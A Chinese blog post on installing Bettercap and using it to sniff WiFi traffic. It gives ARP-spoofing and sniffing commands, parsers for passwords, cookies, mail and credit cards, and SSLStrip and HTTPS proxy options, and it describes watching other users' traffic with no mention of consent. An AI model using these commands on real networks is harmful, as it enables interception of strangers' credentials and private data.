Bettercap的安装和使用嗅探WIFI

一、首先安装bettercap

我这里的环境是ubuntu 16.04

 apt-get install build-essential ruby-dev libpcap-dev git ruby
 gem install bettercap

二、开始嗅探：

 bettercap -I wlp9s0b1 -X

然后会自动发现主机：

之后开始嗅探如下图其实是一张照片。

后面还能看到有人在使用微信，不过腾讯对内容做了加密是没有明文内容的。

下面是摘自他人博客的bettercap具体参数教程：

 -h, --help                          使用帮助;
 -G, --gateway ADDRESS               手动指定网关地址,如果没有指定当前的网关,网关将被自动检索和使用;
 -I, --interface                     指定网络接口名，默认为eth0;
 -S, --spoofer NAME                  指定欺骗模块，此参数默认为ARP，支持ICMP与ARP,可设为None;
 -T, --target ADDRESS1,ADDRESS2      目标IP地址,如果没有将指定整个子网为目标,
     --ignore ADDRESS1,ADDRESS2      寻找目标时,忽略指定的地址;
 -O, --log LOG_FILE                  把所有消息记录到一个文件中,如果未指定则只打印到shell,
     --log-timestamp                 启用日志记录每一行的时间戳,默认禁用;
 -D, --debug                         调试功能，会将每一步操作详细记录，便于调试;
 -L, --local                         解析流经本机的所有数据包（此操作会开启嗅探器），默认为关闭;
 -X, --sniffer                       开启嗅探器,
     --sniffer-source FILE           加载指定的PCAP包文件,而不是使用接口(此操作将开启嗅探器),
     --sniffer-pcap FILE             将数据包保存为指定的PCAP文件（此操作会开启嗅探器),
     --sniffer-filter EXPRESSION     配置嗅探器使用BPF过滤器（此操作会开启嗅探器);
 -P, --parsers PARSERS               解析指定的数据包并用逗号分隔（此操作会开启嗅探器),支持
     IRC, WHATSAPP, HTTPAUTH, HTTPS, MYSQL, POST, REDIS, DICT, COOKIE, NNTP,
     MPD, SNMP, PGSQL, RLOGIN, NTLMSS, SNPP, URL, FTP, DHCP, MAIL, CREDITCARD.
     --custom-parser EXPRESSION      使用正则表达式来捕获和显示嗅探的数据(此操作会开启嗅探器),
     --silent                        如果不是警告或者错误消息,就不显示,默认关闭,
     --no-discovery                  不主动寻找目标主机,只使用当前的ARP缓存,默认关闭,
     --no-spoofing                   禁用欺骗,同--spoofer NONE命令,
     --no-target-nbns                禁用NBNS主机名,
     --half-duplex                   使用半双工模式,遇到大流量路由器时可以保证其正常工作,
     --proxy                         启用HTTP代理和重定向所有HTTP请求,默认关闭,
     --proxy-https                   启用HTTPS代理和重定向所有HTTPS请求,默认关闭,
     --proxy-port PORT               设置HTTP代理端口,默认为8080,
     --http-ports PORT1,PORT2        用逗号分隔需要重定向到代理的HTTP端口,默认为80,
     --https-ports PORT1,PORT2       用逗号分隔需要重定向到代理的HTTPS端口,默认为443,
     --proxy-https-port PORT         设置HTTPS代理端口,默认为8083,
     --proxy-pem FILE                为HTTPS代理使用自定义PEM证书文件,默认文件为
                                     /root/.bettercap/bettercap-ca.pem,
     --proxy-module MODULE           要么加载Ruby代理模块,要么加载injectjs,
                                     injectcss,injecthtml之一
     --custom-proxy ADDRESS          使用一个自定义HTTP上游代理,而不是嵌入式的,
     --custom-proxy-port PORT        为自定义的HTTP上游代理指定一个端口,默认为8080,
     --no-sslstrip                   禁用SSLStrip,
     --custom-https-proxy ADDRESS    使用一个自定义HTTPS上游代理,而不是内置的,
     --custom-https-proxy-port PORT  为自定义的HTTPS端口指定上游代理,默认为8083,
     --custom-redirection RULE       使用自定义的端口重定向,格式是:
     PROTOCOL ORIGINAL_PORT NEW_PORT. 例如:TCP 21 2100,重定向所有TCP流量，从端口21定向到端口2100.
     --httpd                         启用HTTP服务器,默认关闭,
     --httpd-port PORT               设置HTTP服务器端口,默认为8081,
     --dns FILE                      使用DNS服务器文件作为解析表,
     --dns-port PORT                 设置DNS服务器端口,默认为5300,
     --httpd-path PATH               设置HTTP服务器路径,默认为:./,
     --kill                          杀掉连接目标,不转发,
     --packet-throttle NUMBER        设置要发送的每个数据包之间延迟的秒数,
     --check-updates                 检查更新.

官方部分实验命令举例：

 Default sniffer mode, all parsers enabled:
 sudo bettercap -X
 Enable sniffer and load only specified parsers:
 sudo bettercap -X -P “FTP,HTTPAUTH,MAIL,NTLMSS”
 Enable sniffer and use a custom expression:
 sudo bettercap -X –custom-parser “password”
 Enable sniffer + all parsers and parse local traffic as well:
 sudo bettercap -X -L
 Enable sniffer + all parsers and also dump everything to a pcap file:
 sudo bettercap –sniffer –sniffer-pcap=output.pcap
 What about saving only HTTP traffic to that pcap file?
 sudo bettercap –sniffer –sniffer-pcap=http.pcap –sniffer-filter “tcp and dst port 80”
 Default ARP spoofing mode on the whole network without sniffing:
 sudo bettercap

参考：

http://blog.csdn.net/c465869935/article/details/50900067